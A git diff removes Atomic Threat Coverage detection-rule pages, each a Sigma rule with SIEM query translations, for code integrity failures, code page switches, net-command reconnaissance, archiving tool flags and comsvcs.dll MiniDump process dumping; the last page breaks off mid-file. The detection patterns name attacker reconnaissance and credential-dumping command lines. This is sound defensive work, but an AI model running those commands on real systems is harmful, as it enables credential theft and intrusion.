-| **ATT&amp;CK Technique** | <ul><li>[T1009: Binary Padding](https://attack.mitre.org/techniques/T1009)</li><li>[T1027: Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1027: Obfuscated Files or Information](../Triggers/T1027.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Disk device errors</li></ul>  |
-| **Development Status**   | stable |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Thomas Patzke |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Failed Code Integrity Checks
-id: 470ec5fa-7b4e-4071-b200-4c753100f49b
-status: stable
-description: Code integrity failures may indicate tampered executables.
-author: Thomas Patzke
-date: 2019/12/03
-tags:
-    - attack.defense_evasion
-    - attack.t1009
-    - attack.t1027
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID:
-            - 5038
-            - 6281
-    condition: selection
-falsepositives:
-    - Disk device errors
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "5038" -or $_.ID -eq "6281")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:("5038" OR "6281"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/470ec5fa-7b4e-4071-b200-4c753100f49b <<EOF
-{
-  "metadata": {
-    "title": "Failed Code Integrity Checks",
-    "description": "Code integrity failures may indicate tampered executables.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1009",
-      "attack.t1027"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"5038\" OR \"6281\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"5038\" OR \"6281\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Failed Code Integrity Checks'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:("5038" "6281")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="5038" OR EventCode="6281"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["5038", "6281"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*5038|.*6281)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_codepage_switch.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_codepage_switch.md
deleted file mode 100644
index ae9b5df..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_codepage_switch.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Suspicious Code Page Switch       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a code page switch in command line or batch scripts to a rare language |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Administrative activity (adjust code pages according to your organisation's region)</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers](https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers)</li><li>[https://twitter.com/cglyer/status/1183756892952248325](https://twitter.com/cglyer/status/1183756892952248325)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Code Page Switch
-id: c7942406-33dd-4377-a564-0f62db0593a3
-status: experimental
-description: Detects a code page switch in command line or batch scripts to a rare language
-author: Florian Roth
-date: 2019/10/14
-references:
-    - https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers
-    - https://twitter.com/cglyer/status/1183756892952248325
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine: 
-            - 'chcp* 936'  # Chinese
-            # - 'chcp* 1256' # Arabic
-            - 'chcp* 1258' # Vietnamese
-            # - 'chcp* 855'  # Russian
-            # - 'chcp* 866'  # Russian
-            # - 'chcp* 864'  # Arabic
-    condition: selection
-fields:
-    - ParentCommandLine
-falsepositives:
-    - "Administrative activity (adjust code pages according to your organisation's region)"
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*chcp.* 936" -or $_.message -match "CommandLine.*chcp.* 1258")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(chcp*\ 936 OR chcp*\ 1258)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/c7942406-33dd-4377-a564-0f62db0593a3 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Code Page Switch",
-    "description": "Detects a code page switch in command line or batch scripts to a rare language",
-    "tags": "",
-    "query": "winlog.event_data.CommandLine.keyword:(chcp*\\ 936 OR chcp*\\ 1258)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(chcp*\\ 936 OR chcp*\\ 1258)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Code Page Switch'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(chcp* 936 chcp* 1258)
-```
-
-
-### splunk
-    
-```
-(CommandLine="chcp* 936" OR CommandLine="chcp* 1258") | table ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["chcp* 936", "chcp* 1258"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*chcp.* 936|.*chcp.* 1258)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_commands_recon_activity.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_commands_recon_activity.md
deleted file mode 100644
index c4fb1a7..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_commands_recon_activity.md
+++ /dev/null
@@ -1,211 +0,0 @@
-| Title                    | Reconnaissance Activity with Net Command       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a set of commands often used in recon stages by different attack groups |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li><li>[T1082: System Information Discovery](https://attack.mitre.org/techniques/T1082)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1082: System Information Discovery](../Triggers/T1082.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/haroonmeer/status/939099379834658817](https://twitter.com/haroonmeer/status/939099379834658817)</li><li>[https://twitter.com/c_APT_ure/status/939475433711722497](https://twitter.com/c_APT_ure/status/939475433711722497)</li><li>[https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html](https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html)</li></ul>  |
-| **Author**               | Florian Roth, Markus Neis |
-| Other Tags           | <ul><li>car.2016-03-001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Reconnaissance Activity with Net Command
-id: 2887e914-ce96-435f-8105-593937e90757
-status: experimental
-description: Detects a set of commands often used in recon stages by different attack groups
-references:
-    - https://twitter.com/haroonmeer/status/939099379834658817
-    - https://twitter.com/c_APT_ure/status/939475433711722497
-    - https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
-author: Florian Roth, Markus Neis
-date: 2018/08/22
-modified: 2018/12/11
-tags:
-    - attack.discovery
-    - attack.t1087
-    - attack.t1082
-    - car.2016-03-001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - tasklist
-            - net time
-            - systeminfo
-            - whoami
-            - nbtstat
-            - net start
-            - '*\net1 start'
-            - qprocess
-            - nslookup
-            - hostname.exe
-            - '*\net1 user /domain'
-            - '*\net1 group /domain'
-            - '*\net1 group "domain admins" /domain'
-            - '*\net1 group "Exchange Trusted Subsystem" /domain'
-            - '*\net1 accounts /domain'
-            - '*\net1 user net localgroup administrators'
-            - netstat -an
-    timeframe: 15s
-    condition: selection | count() by CommandLine > 4
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "tasklist" -or $_.message -match "net time" -or $_.message -match "systeminfo" -or $_.message -match "whoami" -or $_.message -match "nbtstat" -or $_.message -match "net start" -or $_.message -match "CommandLine.*.*\\net1 start" -or $_.message -match "qprocess" -or $_.message -match "nslookup" -or $_.message -match "hostname.exe" -or $_.message -match "CommandLine.*.*\\net1 user /domain" -or $_.message -match "CommandLine.*.*\\net1 group /domain" -or $_.message -match "CommandLine.*.*\\net1 group \"domain admins\" /domain" -or $_.message -match "CommandLine.*.*\\net1 group \"Exchange Trusted Subsystem\" /domain" -or $_.message -match "CommandLine.*.*\\net1 accounts /domain" -or $_.message -match "CommandLine.*.*\\net1 user net localgroup administrators" -or $_.message -match "netstat -an")) }  | group-object CommandLine | where { $_.count -gt 4 } | select name,count | sort -desc
-```
-
-
-### es-qs
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_susp_commands_recon_activity.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/2887e914-ce96-435f-8105-593937e90757 <<EOF
-{
-  "metadata": {
-    "title": "Reconnaissance Activity with Net Command",
-    "description": "Detects a set of commands often used in recon stages by different attack groups",
-    "tags": [
-      "attack.discovery",
-      "attack.t1087",
-      "attack.t1082",
-      "car.2016-03-001"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(tasklist OR net\\ time OR systeminfo OR whoami OR nbtstat OR net\\ start OR *\\\\net1\\ start OR qprocess OR nslookup OR hostname.exe OR *\\\\net1\\ user\\ \\/domain OR *\\\\net1\\ group\\ \\/domain OR *\\\\net1\\ group\\ \\\"domain\\ admins\\\"\\ \\/domain OR *\\\\net1\\ group\\ \\\"Exchange\\ Trusted\\ Subsystem\\\"\\ \\/domain OR *\\\\net1\\ accounts\\ \\/domain OR *\\\\net1\\ user\\ net\\ localgroup\\ administrators OR netstat\\ \\-an)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "15s"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(tasklist OR net\\ time OR systeminfo OR whoami OR nbtstat OR net\\ start OR *\\\\net1\\ start OR qprocess OR nslookup OR hostname.exe OR *\\\\net1\\ user\\ \\/domain OR *\\\\net1\\ group\\ \\/domain OR *\\\\net1\\ group\\ \\\"domain\\ admins\\\"\\ \\/domain OR *\\\\net1\\ group\\ \\\"Exchange\\ Trusted\\ Subsystem\\\"\\ \\/domain OR *\\\\net1\\ accounts\\ \\/domain OR *\\\\net1\\ user\\ net\\ localgroup\\ administrators OR netstat\\ \\-an)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          },
-          "aggs": {
-            "by": {
-              "terms": {
-                "field": "winlog.event_data.CommandLine",
-                "size": 10,
-                "order": {
-                  "_count": "desc"
-                },
-                "min_doc_count": 5
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.aggregations.by.buckets.0.doc_count": {
-        "gt": 4
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Reconnaissance Activity with Net Command'",
-        "body": "Hits:\n{{#aggregations.by.buckets}}\n {{key}} {{doc_count}}\n{{/aggregations.by.buckets}}\n",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/process_creation/win_susp_commands_recon_activity.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-(CommandLine="tasklist" OR CommandLine="net time" OR CommandLine="systeminfo" OR CommandLine="whoami" OR CommandLine="nbtstat" OR CommandLine="net start" OR CommandLine="*\\net1 start" OR CommandLine="qprocess" OR CommandLine="nslookup" OR CommandLine="hostname.exe" OR CommandLine="*\\net1 user /domain" OR CommandLine="*\\net1 group /domain" OR CommandLine="*\\net1 group \"domain admins\" /domain" OR CommandLine="*\\net1 group \"Exchange Trusted Subsystem\" /domain" OR CommandLine="*\\net1 accounts /domain" OR CommandLine="*\\net1 user net localgroup administrators" OR CommandLine="netstat -an") | eventstats count as val by CommandLine| search val > 4
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["tasklist", "net time", "systeminfo", "whoami", "nbtstat", "net start", "*\\net1 start", "qprocess", "nslookup", "hostname.exe", "*\\net1 user /domain", "*\\net1 group /domain", "*\\net1 group \"domain admins\" /domain", "*\\net1 group \"Exchange Trusted Subsystem\" /domain", "*\\net1 accounts /domain", "*\\net1 user net localgroup administrators", "netstat -an"]) | chart count() as val by CommandLine | search val > 4
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*tasklist|.*net time|.*systeminfo|.*whoami|.*nbtstat|.*net start|.*.*\net1 start|.*qprocess|.*nslookup|.*hostname\.exe|.*.*\net1 user /domain|.*.*\net1 group /domain|.*.*\net1 group "domain admins" /domain|.*.*\net1 group "Exchange Trusted Subsystem" /domain|.*.*\net1 accounts /domain|.*.*\net1 user net localgroup administrators|.*netstat -an)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_compression_params.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_compression_params.md
deleted file mode 100644
index 1234edc..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_compression_params.md
+++ /dev/null
@@ -1,188 +0,0 @@
-| Title                    | Suspicious Compression Tool Parameters       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious command line arguments of common data compression tools |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0010: Exfiltration](https://attack.mitre.org/tactics/TA0010)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1020: Automated Exfiltration](https://attack.mitre.org/techniques/T1020)</li><li>[T1002: Data Compressed](https://attack.mitre.org/techniques/T1002)</li><li>[T1560: Archive Collected Data](https://attack.mitre.org/techniques/T1560)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1560: Archive Collected Data](../Triggers/T1560.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/SBousseaden/status/1184067445612535811](https://twitter.com/SBousseaden/status/1184067445612535811)</li></ul>  |
-| **Author**               | Florian Roth, Samir Bousseaden |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Compression Tool Parameters
-id: 27a72a60-7e5e-47b1-9d17-909c9abafdcd
-status: experimental
-description: Detects suspicious command line arguments of common data compression tools
-references:
-    - https://twitter.com/SBousseaden/status/1184067445612535811
-tags:
-    - attack.exfiltration
-    - attack.t1020
-    - attack.t1002
-    - attack.t1560
-author: Florian Roth, Samir Bousseaden
-date: 2019/10/15
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        OriginalFileName:
-            - '7z*.exe'
-            - '*rar.exe'
-            - '*Command*Line*RAR*'
-        CommandLine:
-            - '* -p*'
-            - '* -ta*'
-            - '* -tb*'
-            - '* -sdel*'
-            - '* -dw*'
-            - '* -hp*'
-    falsepositive:
-        ParentImage: 'C:\Program*'
-    condition: selection and not falsepositive
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and (($_.message -match "OriginalFileName.*7z.*.exe" -or $_.message -match "OriginalFileName.*.*rar.exe" -or $_.message -match "OriginalFileName.*.*Command.*Line.*RAR.*") -and ($_.message -match "CommandLine.*.* -p.*" -or $_.message -match "CommandLine.*.* -ta.*" -or $_.message -match "CommandLine.*.* -tb.*" -or $_.message -match "CommandLine.*.* -sdel.*" -or $_.message -match "CommandLine.*.* -dw.*" -or $_.message -match "CommandLine.*.* -hp.*")) -and  -not ($_.message -match "ParentImage.*C:\\Program.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((OriginalFileName.keyword:(7z*.exe OR *rar.exe OR *Command*Line*RAR*) AND winlog.event_data.CommandLine.keyword:(*\ \-p* OR *\ \-ta* OR *\ \-tb* OR *\ \-sdel* OR *\ \-dw* OR *\ \-hp*)) AND (NOT (winlog.event_data.ParentImage.keyword:C\:\\Program*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/27a72a60-7e5e-47b1-9d17-909c9abafdcd <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Compression Tool Parameters",
-    "description": "Detects suspicious command line arguments of common data compression tools",
-    "tags": [
-      "attack.exfiltration",
-      "attack.t1020",
-      "attack.t1002",
-      "attack.t1560"
-    ],
-    "query": "((OriginalFileName.keyword:(7z*.exe OR *rar.exe OR *Command*Line*RAR*) AND winlog.event_data.CommandLine.keyword:(*\\ \\-p* OR *\\ \\-ta* OR *\\ \\-tb* OR *\\ \\-sdel* OR *\\ \\-dw* OR *\\ \\-hp*)) AND (NOT (winlog.event_data.ParentImage.keyword:C\\:\\\\Program*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((OriginalFileName.keyword:(7z*.exe OR *rar.exe OR *Command*Line*RAR*) AND winlog.event_data.CommandLine.keyword:(*\\ \\-p* OR *\\ \\-ta* OR *\\ \\-tb* OR *\\ \\-sdel* OR *\\ \\-dw* OR *\\ \\-hp*)) AND (NOT (winlog.event_data.ParentImage.keyword:C\\:\\\\Program*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Compression Tool Parameters'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((OriginalFileName.keyword:(7z*.exe *rar.exe *Command*Line*RAR*) AND CommandLine.keyword:(* \-p* * \-ta* * \-tb* * \-sdel* * \-dw* * \-hp*)) AND (NOT (ParentImage.keyword:C\:\\Program*)))
-```
-
-
-### splunk
-    
-```
-(((OriginalFileName="7z*.exe" OR OriginalFileName="*rar.exe" OR OriginalFileName="*Command*Line*RAR*") (CommandLine="* -p*" OR CommandLine="* -ta*" OR CommandLine="* -tb*" OR CommandLine="* -sdel*" OR CommandLine="* -dw*" OR CommandLine="* -hp*")) NOT (ParentImage="C:\\Program*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (OriginalFileName IN ["7z*.exe", "*rar.exe", "*Command*Line*RAR*"] CommandLine IN ["* -p*", "* -ta*", "* -tb*", "* -sdel*", "* -dw*", "* -hp*"])  -(ParentImage="C:\\Program*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*7z.*\.exe|.*.*rar\.exe|.*.*Command.*Line.*RAR.*))(?=.*(?:.*.* -p.*|.*.* -ta.*|.*.* -tb.*|.*.* -sdel.*|.*.* -dw.*|.*.* -hp.*))))(?=.*(?!.*(?:.*(?=.*C:\Program.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_comsvcs_procdump.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_comsvcs_procdump.md
deleted file mode 100644
index 8f30d35..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_comsvcs_procdump.md
+++ /dev/null
@@ -1,184 +0,0 @@
-| Title                    | Process Dump via Comsvcs DLL       |
-|:-------------------------|:------------------|
-| **Description**          | Detects process memory dump via comsvcs.dll and rundll32 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/](https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/)</li><li>[https://twitter.com/SBousseaden/status/1167417096374050817](https://twitter.com/SBousseaden/status/1167417096374050817)</li></ul>  |
-| **Author**               | Modexp (idea) |
-| Other Tags           | <ul><li>attack.t1003.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Process Dump via Comsvcs DLL
-id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c
-status: experimental
-description: Detects process memory dump via comsvcs.dll and rundll32
-references:
-    - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
-    - https://twitter.com/SBousseaden/status/1167417096374050817
-author: Modexp (idea)
-date: 2019/09/02
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    rundll_image:
-        Image: '*\rundll32.exe'
-    rundll_ofn:
-        OriginalFileName: 'RUNDLL32.EXE'
-    selection:
-        CommandLine:
-            - '*comsvcs*MiniDump*full*'
-            - '*comsvcs*MiniDumpW*full*'
-    condition: (rundll_image or rundll_ofn) and selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.001
-falsepositives:
-    - unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.ID -eq "1") -and ($_.message -match "Image.*.*\\rundll32.exe" -or $_.message -match "OriginalFileName.*RUNDLL32.EXE") -and ($_.message -match "CommandLine.*.*comsvcs.*MiniDump.*full.*" -or $_.message -match "CommandLine.*.*comsvcs.*MiniDumpW.*full.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\rundll32.exe OR OriginalFileName:"RUNDLL32.EXE") AND winlog.event_data.CommandLine.keyword:(*comsvcs*MiniDump*full* OR *comsvcs*MiniDumpW*full*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/09e6d5c0-05b8-4ff8-9eeb-043046ec774c <<EOF
-{
-  "metadata": {
-    "title": "Process Dump via Comsvcs DLL",
-    "description": "Detects process memory dump via comsvcs.dll and rundll32",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.001"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\rundll32.exe OR OriginalFileName:\"RUNDLL32.EXE\") AND winlog.event_data.CommandLine.keyword:(*comsvcs*MiniDump*full* OR *comsvcs*MiniDumpW*full*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\rundll32.exe OR OriginalFileName:\"RUNDLL32.EXE\") AND winlog.event_data.CommandLine.keyword:(*comsvcs*MiniDump*full* OR *comsvcs*MiniDumpW*full*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Process Dump via Comsvcs DLL'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
